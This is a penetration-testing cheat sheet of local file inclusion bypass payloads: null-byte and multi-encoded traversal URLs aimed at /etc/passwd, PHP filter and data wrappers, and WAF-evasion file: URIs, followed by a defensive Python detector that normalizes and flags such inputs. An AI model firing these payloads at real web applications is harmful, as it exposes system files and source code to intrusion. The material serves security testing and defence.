pwny.cc
Bypass Techniques

General

#Null byte (%00)
http://web.com/index.php?page=../../../etc/passwd%00

#URL encoding
http://web.com/index.php?page=..%252f..%252f..%252fetc%252fpasswd
http://web.com/index.php?page=..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
http://web.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://web.com/index.php?page=%252e%252e%252fetc%252fpasswd%00

#Path Truncation
##In PHP: /etc/passwd = /etc//passwd = /etc/./passwd = /etc/passwd/ = /etc/passwd/.
Check if last 6 chars are passwd --> passwd/
Check if last 4 chars are ".php" --> shellcode.php/.

PHP Wrappers

#Base64
http://web.com/index.php?page=php://filter/convert.base64-encode/resource=index.php

#Zlib (compression)
http://web.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
#To read it, execute this in your php console
readfile('php://filter/zlib.inflate/resource=test.deflated');

#Data - #Bypass Chrome Auditor
http://web.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+

WAF Bypass

file:/etc/passwd?/
file:/etc/passwd%3F/
file:/etc%252Fpasswd/
file:/etc%252Fpasswd%3F/
file:///etc/?/../passwd
file:///etc/%3F/../passwd
file:${br}/et${u}c/pas${te}swd?/
file:$(br)/et$(u)c/pas$(te)swd?/
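
From the defender's side, the entries in the three lists above differ mainly in encoding and padding, so a filter has to normalize a value before matching it. The Python check below is an added example, not part of the original cheat sheet; the function name `inspect_include_param` and the finding labels are assumptions made for illustration.

```python
import re
from urllib.parse import unquote_to_bytes

WRAPPER_RE = re.compile(rb"^\s*(php|data|file):", re.I)  # schemes listed on this page
SHELL_EXPANSION_RE = re.compile(rb"\$[({]")                # ${x} / $(x) padding
# Overlong UTF-8 forms of "/" and "." (0xC0 is never a valid UTF-8 lead byte).
OVERLONG = {b"\xc0\xaf": b"/", b"\xc0\xae": b"."}


def inspect_include_param(raw: str, max_rounds: int = 5) -> set:
    """Return findings for one raw (still percent-encoded) parameter value."""
    findings = set()
    data = raw.encode("utf-8", "surrogateescape")

    # Decode until the value stops changing, so %252f -> %2f -> / is seen.
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data, rounds = decoded, rounds + 1
    if rounds > 1:
        findings.add("multi-encoded")

    if b"\x00" in data:
        findings.add("null-byte")
    if b"\xc0" in data or b"\xc1" in data:
        findings.add("overlong-utf8")
        for seq, plain in OVERLONG.items():
            data = data.replace(seq, plain)

    match = WRAPPER_RE.match(data)
    if match:
        findings.add("wrapper:" + match.group(1).decode().lower())
    if SHELL_EXPANSION_RE.search(data):
        findings.add("shell-expansion")

    # Compare whole path segments so "a..b" is not mistaken for traversal.
    path = data.replace(b"\\", b"/").rstrip(b"\x00")
    if b".." in path.split(b"/"):
        findings.add("traversal")
    if path.endswith((b"/", b"/.")):
        findings.add("path-padding")
    return findings
```

A check like this belongs in logging and alerting; the include itself should still resolve the `page` value against a fixed allowlist of files.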